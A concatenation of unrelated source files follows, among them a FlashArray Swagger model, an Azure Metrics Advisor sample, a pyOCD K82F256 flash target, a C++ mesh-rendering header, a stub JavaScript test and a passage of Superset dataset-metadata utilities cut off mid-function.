cl61KUJxg7Bi/ISJYRdonvLT+OGaabLSTu7VyYjo1UJGn7gD36xg68Y6t/KfK7k8jMvNtg87u1p2UTK7jx21pE3mptcyaVgrJwGggtbL0zuztdUUGuLdnc+ZcMMa3fnhbAxFraR//yA8QJJ+1cg0rzKlUTyHMV4hAIT/52jiMUTyTUF5BqnfI6Ck3p9fcZzFKmwfQxBoSDnKKTgcYjFfcHXD0lz4gUEUwJNGuZ3OPEysNAXzRyNQ4M8x3iDlIVQk4YZ+NuMz3WJNZfhaJyZuIwK0RpY7n1GkAjn6WtGvA8/bcJvPF9iVoQtDCb7BRCyHqf0836IzW6x4gPhqfN+mIKfp3tn/ixbvLd6shQTBAeLOU4sWYxnaP8RYAArBAM3cLcJyQAAAABJRU5ErkJggg==',
height: 53,
width: 53,
textSize: '20',
textColor: '#fff'
}
]
});
|
# coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.10
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_10 import models
class VolumeGroupPost(object):
    """
    Swagger-generated model for the body of a volume-group POST request
    (FlashArray REST API 2.10).

    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Swagger-declared type for every model attribute; to_dict() iterates this map.
    swagger_types = {
        'id': 'str',
        'name': 'str',
        'destroyed': 'bool',
        'qos': 'Qos',
        'priority_adjustment': 'PriorityAdjustment',
        'space': 'Space',
        'time_remaining': 'int',
        'volume_count': 'int'
    }
    # Model attribute name -> JSON key on the wire (identical here, kept for
    # consistency with the other generated models).
    attribute_map = {
        'id': 'id',
        'name': 'name',
        'destroyed': 'destroyed',
        'qos': 'qos',
        'priority_adjustment': 'priority_adjustment',
        'space': 'space',
        'time_remaining': 'time_remaining',
        'volume_count': 'volume_count'
    }
    # No constructor arguments are mandatory for this model.
    required_args = {
    }

    def __init__(
        self,
        id=None,  # type: str
        name=None,  # type: str
        destroyed=None,  # type: bool
        qos=None,  # type: models.Qos
        priority_adjustment=None,  # type: models.PriorityAdjustment
        space=None,  # type: models.Space
        time_remaining=None,  # type: int
        volume_count=None,  # type: int
    ):
        """
        Keyword args:
            id (str): A globally unique, system-generated ID. The ID cannot be modified and cannot refer to another resource.
            name (str): A user-specified name. The name must be locally unique and can be changed.
            destroyed (bool): Destroy or recover a volume group. To destroy a volume group, patch to `true`. To recover a destroyed volume group, patch to `false`. If not specified, defaults to `false`.
            qos (Qos)
            priority_adjustment (PriorityAdjustment)
            space (Space)
            time_remaining (int): The amount of time left until the destroyed volume group is permanently eradicated, measured in milliseconds.
            volume_count (int): The number of volumes in the volume group.
        """
        # Only assign attributes that were explicitly provided, so that
        # hasattr()/to_dict() can distinguish "unset" from "set to a value".
        if id is not None:
            self.id = id
        if name is not None:
            self.name = name
        if destroyed is not None:
            self.destroyed = destroyed
        if qos is not None:
            self.qos = qos
        if priority_adjustment is not None:
            self.priority_adjustment = priority_adjustment
        if space is not None:
            self.space = space
        if time_remaining is not None:
            self.time_remaining = time_remaining
        if volume_count is not None:
            self.volume_count = volume_count

    def __setattr__(self, key, value):
        # Reject attributes that are not part of the Swagger model definition.
        if key not in self.attribute_map:
            raise KeyError("Invalid key `{}` for `VolumeGroupPost`".format(key))
        self.__dict__[key] = value

    def __getattribute__(self, item):
        value = object.__getattribute__(self, item)
        if isinstance(value, Property):
            # Class-level Property placeholders must not leak through as
            # instance values; raising AttributeError makes hasattr() False.
            raise AttributeError
        else:
            return value

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        for attr, _ in six.iteritems(self.swagger_types):
            # Skip attributes that were never set (see __getattribute__).
            if hasattr(self, attr):
                value = getattr(self, attr)
                if isinstance(value, list):
                    # Recursively serialize model objects inside lists.
                    result[attr] = list(map(
                        lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                        value
                    ))
                elif hasattr(value, "to_dict"):
                    result[attr] = value.to_dict()
                elif isinstance(value, dict):
                    # Recursively serialize model objects stored as dict values.
                    result[attr] = dict(map(
                        lambda item: (item[0], item[1].to_dict())
                        if hasattr(item[1], "to_dict") else item,
                        value.items()
                    ))
                else:
                    result[attr] = value
        if issubclass(VolumeGroupPost, dict):
            for key, value in self.items():
                result[key] = value
        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, VolumeGroupPost):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""
FILE: sample_detection_configuration.py
DESCRIPTION:
This sample demonstrates how to create, get, list, update, and delete anomaly detection configurations
under your Metrics Advisor account.
USAGE:
python sample_detection_configuration.py
Set the environment variables with your own values before running the sample:
1) METRICS_ADVISOR_ENDPOINT - the endpoint of your Azure Metrics Advisor service
2) METRICS_ADVISOR_SUBSCRIPTION_KEY - Metrics Advisor service subscription key
3) METRICS_ADVISOR_API_KEY - Metrics Advisor service API key
4) METRICS_ADVISOR_METRIC_ID - the ID of an metric from an existing data feed
"""
import os
def sample_create_detection_config():
    """Create an anomaly detection configuration that combines change,
    hard-threshold, and smart-detection conditions, and return it."""
    # [START create_detection_config]
    from azure.ai.metricsadvisor import MetricsAdvisorKeyCredential, MetricsAdvisorAdministrationClient
    from azure.ai.metricsadvisor.models import (
        ChangeThresholdCondition,
        HardThresholdCondition,
        SmartDetectionCondition,
        SuppressCondition,
        MetricDetectionCondition,
        AnomalyDetectionConfiguration
    )
    endpoint = os.getenv("METRICS_ADVISOR_ENDPOINT")
    sub_key = os.getenv("METRICS_ADVISOR_SUBSCRIPTION_KEY")
    api_key = os.getenv("METRICS_ADVISOR_API_KEY")
    metric_id = os.getenv("METRICS_ADVISOR_METRIC_ID")
    credential = MetricsAdvisorKeyCredential(sub_key, api_key)
    client = MetricsAdvisorAdministrationClient(endpoint, credential)

    # Condition 1: flag points that change more than 20% vs. the shifted point.
    change_condition = ChangeThresholdCondition(
        anomaly_detector_direction="Both",
        change_percentage=20,
        shift_point=10,
        within_range=True,
        suppress_condition=SuppressCondition(
            min_number=5,
            min_ratio=2
        )
    )
    # Condition 2: flag points exceeding an absolute upper bound.
    hard_condition = HardThresholdCondition(
        anomaly_detector_direction="Up",
        upper_bound=100,
        suppress_condition=SuppressCondition(
            min_number=2,
            min_ratio=2
        )
    )
    # Condition 3: service-side smart detection with a sensitivity knob.
    smart_condition = SmartDetectionCondition(
        anomaly_detector_direction="Up",
        sensitivity=10,
        suppress_condition=SuppressCondition(
            min_number=2,
            min_ratio=2
        )
    )
    # Apply all three to the whole series, OR-combined.
    config_model = AnomalyDetectionConfiguration(
        name="my_detection_config",
        metric_id=metric_id,
        description="anomaly detection config for metric",
        whole_series_detection_condition=MetricDetectionCondition(
            cross_conditions_operator="OR",
            change_threshold_condition=change_condition,
            hard_threshold_condition=hard_condition,
            smart_detection_condition=smart_condition
        )
    )
    return client.create_detection_configuration(config_model)
    # [END create_detection_config]
def sample_get_detection_config(detection_config_id):
    """Fetch a detection configuration by ID and print all of its
    whole-series detection conditions.

    Args:
        detection_config_id: ID of an existing anomaly detection configuration.
    """
    # [START get_detection_config]
    from azure.ai.metricsadvisor import MetricsAdvisorKeyCredential, MetricsAdvisorAdministrationClient
    service_endpoint = os.getenv("METRICS_ADVISOR_ENDPOINT")
    subscription_key = os.getenv("METRICS_ADVISOR_SUBSCRIPTION_KEY")
    api_key = os.getenv("METRICS_ADVISOR_API_KEY")
    client = MetricsAdvisorAdministrationClient(service_endpoint,
                                                MetricsAdvisorKeyCredential(subscription_key, api_key))
    config = client.get_detection_configuration(detection_config_id)
    print("Detection config name: {}".format(config.name))
    print("Description: {}".format(config.description))
    print("Metric ID: {}".format(config.metric_id))
    print("\nDetection conditions specified for configuration...")
    print("\nWhole Series Detection Conditions:\n")
    conditions = config.whole_series_detection_condition
    print("Use {} operator for multiple detection conditions".format(conditions.cross_conditions_operator))
    print("Smart Detection Condition:")
    print("- Sensitivity: {}".format(conditions.smart_detection_condition.sensitivity))
    print("- Detection direction: {}".format(conditions.smart_detection_condition.anomaly_detector_direction))
    print("- Suppress conditions: minimum number: {}; minimum ratio: {}".format(
        conditions.smart_detection_condition.suppress_condition.min_number,
        conditions.smart_detection_condition.suppress_condition.min_ratio
    ))
    print("Hard Threshold Condition:")
    print("- Lower bound: {}".format(conditions.hard_threshold_condition.lower_bound))
    print("- Upper bound: {}".format(conditions.hard_threshold_condition.upper_bound))
    # BUG FIX: the following lines previously printed the smart-detection
    # condition's direction/suppress settings instead of the hard-threshold ones.
    print("- Detection direction: {}".format(conditions.hard_threshold_condition.anomaly_detector_direction))
    print("- Suppress conditions: minimum number: {}; minimum ratio: {}".format(
        conditions.hard_threshold_condition.suppress_condition.min_number,
        conditions.hard_threshold_condition.suppress_condition.min_ratio
    ))
    print("Change Threshold Condition:")
    print("- Change percentage: {}".format(conditions.change_threshold_condition.change_percentage))
    print("- Shift point: {}".format(conditions.change_threshold_condition.shift_point))
    print("- Detect anomaly if within range: {}".format(conditions.change_threshold_condition.within_range))
    # BUG FIX: same copy-paste issue — report the change-threshold condition's
    # own direction/suppress settings, not the smart-detection condition's.
    print("- Detection direction: {}".format(conditions.change_threshold_condition.anomaly_detector_direction))
    print("- Suppress conditions: minimum number: {}; minimum ratio: {}".format(
        conditions.change_threshold_condition.suppress_condition.min_number,
        conditions.change_threshold_condition.suppress_condition.min_ratio
    ))
    # [END get_detection_config]
def sample_list_detection_configs():
    """List every detection configuration attached to a metric and print a
    short summary for each."""
    # [START list_detection_configs]
    from azure.ai.metricsadvisor import MetricsAdvisorKeyCredential, MetricsAdvisorAdministrationClient
    endpoint = os.getenv("METRICS_ADVISOR_ENDPOINT")
    sub_key = os.getenv("METRICS_ADVISOR_SUBSCRIPTION_KEY")
    api_key = os.getenv("METRICS_ADVISOR_API_KEY")
    metric_id = os.getenv("METRICS_ADVISOR_METRIC_ID")
    credential = MetricsAdvisorKeyCredential(sub_key, api_key)
    client = MetricsAdvisorAdministrationClient(endpoint, credential)

    for config in client.list_detection_configurations(metric_id=metric_id):
        print("Detection config name: {}".format(config.name))
        print("Description: {}".format(config.description))
        print("Metric ID: {}\n".format(config.metric_id))
    # [END list_detection_configs]
def sample_update_detection_config(detection_config):
    """Rename a detection configuration and attach per-group and per-series
    detection conditions to it.

    Args:
        detection_config: an existing AnomalyDetectionConfiguration model.
    """
    # [START update_detection_config]
    from azure.ai.metricsadvisor import MetricsAdvisorKeyCredential, MetricsAdvisorAdministrationClient
    from azure.ai.metricsadvisor.models import (
        MetricSeriesGroupDetectionCondition,
        MetricSingleSeriesDetectionCondition,
        SmartDetectionCondition,
        SuppressCondition
    )
    endpoint = os.getenv("METRICS_ADVISOR_ENDPOINT")
    sub_key = os.getenv("METRICS_ADVISOR_SUBSCRIPTION_KEY")
    api_key = os.getenv("METRICS_ADVISOR_API_KEY")
    credential = MetricsAdvisorKeyCredential(sub_key, api_key)
    client = MetricsAdvisorAdministrationClient(endpoint, credential)

    # Mutate the passed-in model in place, then push the update.
    detection_config.name = "updated config name"
    detection_config.description = "updated with more detection conditions"
    smart_condition = SmartDetectionCondition(
        anomaly_detector_direction="Up",
        sensitivity=10,
        suppress_condition=SuppressCondition(
            min_number=2,
            min_ratio=2
        )
    )
    group_conditions = [
        MetricSeriesGroupDetectionCondition(
            series_group_key={"city": "Seoul"},
            smart_detection_condition=smart_condition
        )
    ]
    series_conditions = [
        MetricSingleSeriesDetectionCondition(
            series_key={"city": "Osaka", "category": "Cell Phones"},
            smart_detection_condition=smart_condition
        )
    ]
    updated = client.update_detection_configuration(
        detection_config,
        series_group_detection_conditions=group_conditions,
        series_detection_conditions=series_conditions
    )
    print("Updated detection name: {}".format(updated.name))
    print("Updated detection description: {}".format(updated.description))
    print("Updated detection condition for series group: {}".format(
        updated.series_group_detection_conditions[0].series_group_key
    ))
    print("Updated detection condition for series: {}".format(
        updated.series_detection_conditions[0].series_key
    ))
    # [END update_detection_config]
def sample_delete_detection_config(detection_config_id):
    """Delete a detection configuration and verify the deletion by expecting
    a ResourceNotFoundError on a follow-up fetch."""
    # [START delete_detection_config]
    from azure.core.exceptions import ResourceNotFoundError
    from azure.ai.metricsadvisor import MetricsAdvisorKeyCredential, MetricsAdvisorAdministrationClient
    endpoint = os.getenv("METRICS_ADVISOR_ENDPOINT")
    sub_key = os.getenv("METRICS_ADVISOR_SUBSCRIPTION_KEY")
    api_key = os.getenv("METRICS_ADVISOR_API_KEY")
    credential = MetricsAdvisorKeyCredential(sub_key, api_key)
    client = MetricsAdvisorAdministrationClient(endpoint, credential)

    client.delete_detection_configuration(detection_config_id)
    try:
        client.get_detection_configuration(detection_config_id)
    except ResourceNotFoundError:
        print("Detection configuration successfully deleted.")
    # [END delete_detection_config]
if __name__ == '__main__':
    # Walk the full configuration lifecycle: create -> get -> list -> update -> delete.
    print("---Creating anomaly detection configuration...")
    detection_config = sample_create_detection_config()
    print("Anomaly detection configuration successfully created...")
    print("\n---Get an anomaly detection configuration...")
    sample_get_detection_config(detection_config.id)
    print("\n---List anomaly detection configurations...")
    sample_list_detection_configs()
    print("\n---Update an anomaly detection configuration...")
    sample_update_detection_config(detection_config)
    print("\n---Delete an anomaly detection configuration...")
    sample_delete_detection_config(detection_config.id)
|
"""
Flash OS Routines (Automagically Generated)
Copyright (c) 2009-2015 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from .family.target_kinetis import Kinetis
from .family.flash_kinetis import Flash_Kinetis
from ..core.memory_map import (FlashRegion, RamRegion, RomRegion, MemoryMap)
from ..debug.svd import SVDFile
import logging
# Generated flash-programming algorithm blob for the K82F256 target.
# The 'instructions' array is position-independent thumb code loaded at
# 'load_address'; the pc_* entries are offsets of its entry points.
# (Fix: dropped the stray trailing semicolon after the dict literal.)
flash_algo = {
    'load_address' : 0x20000000,
    'instructions' : [
        0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
        0xb510483e, 0x5120f24c, 0xf64d81c1, 0x81c11128, 0xf0218801, 0x80010101, 0x78414839, 0x0160f001,
        0xbf0c2940, 0x21002101, 0x444a4a36, 0xb1397011, 0xf0217841, 0x70410160, 0xf0117841, 0xd1fb0f60,
        0x44484831, 0xf864f000, 0xbf182800, 0xbd102001, 0x4448482c, 0xb1587800, 0x78414829, 0x0160f021,
        0x0140f041, 0x78417041, 0x0160f001, 0xd1fa2940, 0x47702000, 0xb5104824, 0x44484924, 0xf897f000,
        0xbf182800, 0x2100bd10, 0xe8bd481f, 0x44484010, 0xb95df000, 0x4c1cb570, 0x444c4605, 0x4b1b4601,
        0x68e24620, 0xf8bbf000, 0xbf182800, 0x2300bd70, 0x68e24629, 0x4070e8bd, 0x44484813, 0xb951f000,
        0x460cb570, 0x4606460b, 0x480f4601, 0x4615b084, 0xf0004448, 0x2800f8f0, 0xb004bf1c, 0x2000bd70,
        0xe9cd2101, 0x90021000, 0x462b4807, 0x46314622, 0xf0004448, 0xb004f984, 0x0000bd70, 0x40052000,
        0x4007e000, 0x00000004, 0x00000008, 0x6b65666b, 0xbf042800, 0x47702004, 0x6cc949ec, 0x6103f3c1,
        0xbf08290f, 0x2180f44f, 0x4ae9bf1f, 0xf832447a, 0x02891011, 0xe9c02200, 0x21012100, 0x03096081,
        0x49e460c1, 0x3f28f811, 0x7c80f44f, 0xf303fa0c, 0x78c96143, 0x62026102, 0x61816242, 0x47704610,
        0xbf0e2800, 0x61012004, 0x47702000, 0x48da4602, 0x49d96840, 0x0070f440, 0x47706048, 0x217048d5,
        0x21807001, 0x78017001, 0x0f80f011, 0x7800d0fb, 0x0f20f010, 0x2067bf1c, 0xf0104770, 0xbf1c0f10,
        0x47702068, 0x0001f010, 0x2069bf18, 0x28004770, 0x2004bf04, 0xb5104770, 0x4ac64604, 0x403bf06f,
        0x48c66050, 0xbf144281, 0x2000206b, 0xbf182800, 0x4620bd10, 0xffd2f7ff, 0x46204603, 0xffc6f7ff,
        0xbd104618, 0xbf042800, 0x47702004, 0x60532300, 0x60d36093, 0x61536113, 0x61d36193, 0x68c16011,
        0xe9d06051, 0xfbb11001, 0x6090f0f0, 0x21102004, 0x0103e9c2, 0x1005e9c2, 0x200061d0, 0xe92d4770,
        0xb0884df0, 0x46984615, 0x4682460c, 0xf7ff466a, 0x462affd9, 0x46504621, 0xf0009b04, 0x0007f931,
        0xb008bf1c, 0x8df0e8bd, 0x4600e9dd, 0x1e451960, 0xf0f6fbb5, 0x5010fb06, 0xfbb5b120, 0x1c40f0f6,
        0x1e454370, 0xbf9842ac, 0xb268f8df, 0xf024d81c, 0xf040407f, 0xf8cb6010, 0x48980004, 0xbf144580,
        0x2000206b, 0xbf1c2800, 0xe8bdb008, 0x46508df0, 0xff74f7ff, 0xf8da4607, 0x28000010, 0x4780bf18,
        0x4434b917, 0xd9e242ac, 0xf7ff4650, 0xb008ff5f, 0xe8bd4638, 0x2a008df0, 0x2004bf04, 0xe92d4770,
        0xb08945f0, 0x461e4614, 0x4680460d, 0xf7ff466a, 0x4632ff89, 0x46404629, 0xf0009b03, 0x0007f8e1,
        0xb009bf1c, 0x85f0e8bd, 0x2e009d00, 0xf8dfbf18, 0xd025a1e4, 0x0b04f854, 0x0008f8ca, 0x28049803,
        0xf025bf04, 0xf040407f, 0xd00960c0, 0xd1092808, 0x0b04f854, 0x000cf8ca, 0x407ff025, 0x60e0f040,
        0x0004f8ca, 0xf7ff4640, 0xf8d8ff29, 0x46071010, 0xbf182900, 0xb91f4788, 0x44059803, 0xd1d91a36,
        0xf7ff4640, 0xb009ff13, 0xe8bd4638, 0x280085f0, 0x2004bf04, 0x4a624770, 0x4101ea42, 0x60514a5d,
        0xe92de70c, 0xb0884dff, 0x469a4614, 0x466a460d, 0xf7ff9808, 0x4622ff37, 0x9b054629, 0xf0009808,
        0x2800f88f, 0xb00cbf1c, 0x8df0e8bd, 0x4629466a, 0xf7ff9808, 0x9e00ff27, 0x8008f8dd, 0xf1c84270,
        0x40080100, 0x42b74247, 0x4447bf08, 0xbf182c00, 0xb120f8df, 0x1bbdd01f, 0xbf8842a5, 0x98054625,
        0x417ff026, 0xf0f0fbb5, 0x7180f041, 0x1004f8cb, 0xea400400, 0xf040200a, 0xf8cb00ff, 0x98080008,
        0xfeccf7ff, 0xbf1c2800, 0xe8bdb00c, 0x1b648df0, 0x4447442e, 0xb00cd1df, 0xe8bd2000, 0x2b008df0,
        0x2004bf04, 0xe92d4770, 0xb0884dff, 0xe9dd4616, 0x461d7a14, 0x466a460c, 0x8058f8dd, 0xf7ff9808,
        0xe9ddfee1, 0x46323007, 0xf0004621, 0x2800f839, 0xb00cbf1c, 0x8df0e8bd, 0x2e009c00, 0xb00cbf04,
        0x8df0e8bd, 0xb08cf8df, 0x407ff06f, 0x6707ea40, 0x407ff024, 0x7000f040, 0x0004f8cb, 0x7008f8cb,
        0xf8cb6828, 0x9808000c, 0xfe88f7ff, 0xf1bab168, 0xbf180f00, 0x4000f8ca, 0x0f00f1b8, 0x2100bf1c,
        0x1000f8c8, 0xe8bdb00c, 0x99078df0, 0xf0211a76, 0x440d0103, 0x440c9907, 0xb00cd1da, 0x8df0e8bd,
        0xbf042800, 0x47702004, 0x42191e5b, 0x421abf0e, 0x47702065, 0x428b6803, 0x6840d806, 0x44184411,
        0xbf244288, 0x47702000, 0x47702066, 0x40048000, 0x000003bc, 0x40020000, 0x4001f000, 0x6b65666b,
        0x4000ffff, 0x40020004, 0x40020010, 0x00100008, 0x00200018, 0x00400030, 0x00800060, 0x010000c0,
        0x02000180, 0x04000300, 0x00000600, 0x00000000, 0x00000000,
    ],
    'pc_init' : 0x20000021,
    'pc_unInit': 0x20000071,
    'pc_program_page': 0x200000E1,
    'pc_erase_sector': 0x200000B5,
    'pc_eraseAll' : 0x20000095,
    'static_base' : 0x20000000 + 0x00000020 + 0x0000050c,
    'begin_stack' : 0x20000000 + 0x00000800,
    'begin_data' : 0x20000000 + 0x00000A00,
    'page_size' : 0x00000200,
    'analyzer_supported' : True,
    'analyzer_address' : 0x1ffff000,  # Analyzer 0x1ffff000..0x1ffff600
    'page_buffers' : [0x20003000, 0x20004000],  # Enable double buffering
    'min_program_length' : 8,
}
class Flash_k82f25615(Flash_Kinetis):
    """Flash driver for the K82F256 part, bound to the module-level
    ``flash_algo`` blob above."""
    def __init__(self, target):
        super(Flash_k82f25615, self).__init__(target, flash_algo)
class K82F25615(Kinetis):
    """Target definition for the NXP/Freescale K82F256 (Kinetis family)."""
    # 256 KiB flash at 0x0 (boot memory), 256 KiB RAM starting at 0x1fff0000.
    memoryMap = MemoryMap(
        FlashRegion(    start=0,           length=0x40000,      blocksize=0x1000, isBootMemory=True),
        RamRegion(      start=0x1fff0000,  length=0x40000)
        )
    def __init__(self, transport):
        super(K82F25615, self).__init__(transport, self.memoryMap)
        # MDM-AP ID register value used to positively identify the device.
        self.mdm_idr = 0x001c0000
        self._svd_location = SVDFile(vendor="Freescale", filename="MK82F25615.svd")
|
#ifndef FACESHAPEFROMSHADING_OFFSCREENMESHVISUALIZER_H
#define FACESHAPEFROMSHADING_OFFSCREENMESHVISUALIZER_H
//#include "Geometry/geometryutils.hpp"
//#include "Utils/utility.hpp"
#include "basicmesh.h"
#include "parameters.h"
#include <QDir>
#include <QImage>
#include <QOpenGLContext>
#include <QOpenGLFramebufferObject>
#include <QOffscreenSurface>
#include <boost/timer/timer.hpp>
#include "nlohmann/json.hpp"
using json = nlohmann::json;
namespace ColorEncoding {
  // Pack an index into an RGB triple, one byte per channel:
  // r holds the least-significant byte, b the most-significant.
  inline void encode_index(int idx, unsigned char& r, unsigned char& g, unsigned char& b) {
    r = static_cast<unsigned char>(idx & 0xff);
    g = static_cast<unsigned char>((idx >> 8) & 0xff);
    b = static_cast<unsigned char>((idx >> 16) & 0xff);
  }
  // Inverse of encode_index: rebuild the index from the RGB channels.
  // The result is written to idx and also returned for convenience.
  inline int decode_index(unsigned char r, unsigned char g, unsigned char b, int& idx) {
    idx = (static_cast<int>(b) << 16) | (static_cast<int>(g) << 8) | static_cast<int>(r);
    return idx;
  }
}
// Renders a BasicMesh into an offscreen Qt framebuffer, with selectable
// projection setup (MVPMode) and render content (RenderMode).
class OffscreenMeshVisualizer {
public:
  // How the model/view/projection transform is configured before drawing.
  enum MVPMode {
    OrthoNormal,
    OrthoNormalExtended,
    CamPerspective,
    BackgroundImage
  };
  // What gets rasterized into the offscreen buffer.
  enum RenderMode {
    Texture,
    BarycentricCoordinates,
    Normal,
    Mesh,
    MeshAndImage,
    TexturedMesh
  };
  OffscreenMeshVisualizer(int width, int height)
    : width(width), height(height), index_encoded(true), lighting_enabled(false) {
    // Load rendering settings
    // NOTE(review): settings path is hard-coded under the user's home
    // directory; confirm the file exists in deployment environments.
    {
      const string home_directory = QDir::homePath().toStdString();
      cout << "Home dir: " << home_directory << endl;
      ifstream fin(home_directory + "/Data/Settings/blendshape_vis_ao.json");
      fin >> rendering_settings;
    }
  }

  // Replace the default rendering settings with those from `filename` (JSON).
  void LoadRenderingSettings(const string& filename) {
    ifstream fin(filename);
    fin >> rendering_settings;
  }

  // Copies the mesh to be rendered.
  void BindMesh(const BasicMesh& in_mesh) {
    mesh = in_mesh;
  }
  // Texture used by Texture/TexturedMesh render modes.
  void BindTexture(const QImage& in_texture) {
    texture = in_texture;
  }
  // Background image used by MeshAndImage/BackgroundImage modes.
  void BindImage(const QImage& img) {
    image = img;
  }
  // Rigid transform applied to the mesh before projection.
  void SetMeshRotationTranslation(const Vector3d& R, const Vector3d& T) {
    mesh_rotation = R;
    mesh_translation = T;
  }
  void SetCameraParameters(const CameraParameters& cam_params) {
    camera_params = cam_params;
  }
  // Restrict rendering to a subset of face indices (empty = all faces).
  void SetFacesToRender(const vector<int>& indices) {
    faces_to_render = indices;
  }
  void SetNormals(const vector<float>& ns) {
    normals = ns;
  }
  // Per-vertex ambient-occlusion values.
  void SetAmbientOcclusion(const vector<float>& ao_in) {
    ao = ao_in;
  }
  void SetRenderMode(RenderMode mode_in) {
    render_mode = mode_in;
  }
  void SetMVPMode(MVPMode mode_in) {
    mode = mode_in;
  }
  // When true, face indices are encoded into RGB via ColorEncoding.
  void SetIndexEncoded(bool val) {
    index_encoded = val;
  }
  void SetEnableLighting(bool val) {
    lighting_enabled = val;
  }

  // Render offscreen and return the resulting image; RenderWithDepth also
  // returns the depth buffer as floats.
  QImage Render(bool multi_sampled=false) const;
  pair<QImage, vector<float>> RenderWithDepth(bool multi_sampled=false) const;

protected:
  void SetupViewing(const MVPMode&) const;
  void CreateTexture() const;
  void EnableLighting() const;
  void DisableLighting() const;

private:
  int width, height;               // offscreen framebuffer size in pixels
  MVPMode mode;
  RenderMode render_mode;

  Vector3d mesh_rotation, mesh_translation;
  CameraParameters camera_params;

  // mutable: these are consumed/modified from the const Render() paths.
  mutable vector<int> faces_to_render;
  mutable vector<float> normals;
  mutable vector<float> ao;

  bool index_encoded;              // encode face indices as RGB colors
  bool lighting_enabled;
  BasicMesh mesh;
  QImage image;                    // background image
  mutable GLuint image_tex;        // GL texture id for `image`
  QImage texture;                  // mesh texture
  mutable glm::dmat4 Mview;        // cached view matrix

  json rendering_settings;
  mutable vector<GLuint> enabled_lights;
};
#endif //FACESHAPEFROMSHADING_OFFSCREENMESHVISUALIZER_H
|
'use strict';

// Placeholder smoke suite for ajaxQueue — keeps the spec file wired into the
// test runner until real behavioral specs are written.
describe("ajaxQueue", () => {
    it("test", () => {
        expect(true).toBe(true);
    });
});
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from contextlib import closing
from typing import Any, Callable, Dict, List, Optional, Set, TYPE_CHECKING
import sqlparse
from flask_babel import lazy_gettext as _
from sqlalchemy import and_, or_
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy.orm import Session
from sqlalchemy.sql.type_api import TypeEngine
from superset.columns.models import Column as NewColumn
from superset.errors import ErrorLevel, SupersetError, SupersetErrorType
from superset.exceptions import (
SupersetGenericDBErrorException,
SupersetSecurityException,
)
from superset.models.core import Database
from superset.result_set import SupersetResultSet
from superset.sql_parse import has_table_query, insert_rls, ParsedQuery, Table
from superset.superset_typing import ResultSetColumnType
from superset.tables.models import Table as NewTable
if TYPE_CHECKING:
from superset.connectors.sqla.models import SqlaTable
def get_physical_table_metadata(
    database: Database,
    table_name: str,
    schema_name: Optional[str] = None,
) -> List[Dict[str, Any]]:
    """Use SQLAlchemy inspector to get table metadata.

    Returns the inspector's column dicts, with ``type`` stringified and
    ``type_generic``/``is_dttm`` filled in from the engine spec.
    """
    db_engine_spec = database.db_engine_spec
    db_dialect = database.get_dialect()
    # Treat an empty schema string the same as "no schema".
    schema = schema_name if schema_name else None

    # Table does not exist or is not visible to a connection.
    found = database.has_table_by_name(
        table_name=table_name, schema=schema
    ) or database.has_view_by_name(view_name=table_name, schema=schema)
    if not found:
        raise NoSuchTableError

    columns = database.get_columns(table_name, schema=schema)
    for column in columns:
        try:
            if isinstance(column["type"], TypeEngine):
                db_type = db_engine_spec.column_datatype_to_string(
                    column["type"], db_dialect
                )
                spec = db_engine_spec.get_column_spec(
                    db_type, db_extra=database.get_extra()
                )
                column["type"] = db_type
                column["type_generic"] = spec.generic_type if spec else None
                column["is_dttm"] = spec.is_dttm if spec else None
        # Broad exception catch, because there are multiple possible exceptions
        # from different drivers that fall outside CompileError
        except Exception:  # pylint: disable=broad-except
            column["type"] = "UNKNOWN"
            column["type_generic"] = None
            column["is_dttm"] = None
    return columns
def get_virtual_table_metadata(dataset: "SqlaTable") -> List[ResultSetColumnType]:
    """Use SQLparser to get virtual dataset metadata"""
    if not dataset.sql:
        raise SupersetGenericDBErrorException(
            message=_("Virtual dataset query cannot be empty"),
        )

    db_engine_spec = dataset.database.db_engine_spec
    engine = dataset.database.get_sqla_engine(schema=dataset.schema)
    # Render any Jinja templating in the dataset SQL before parsing it.
    sql = dataset.get_template_processor().process_template(
        dataset.sql, **dataset.template_params_dict
    )
    parsed_query = ParsedQuery(sql)
    # Security gate 1: only read-only statements are allowed.
    if not db_engine_spec.is_readonly_query(parsed_query):
        raise SupersetSecurityException(
            SupersetError(
                error_type=SupersetErrorType.DATASOURCE_SECURITY_ACCESS_ERROR,
                message=_("Only `SELECT` statements are allowed"),
                level=ErrorLevel.ERROR,
            )
        )
    # Security gate 2: exactly one statement per virtual dataset.
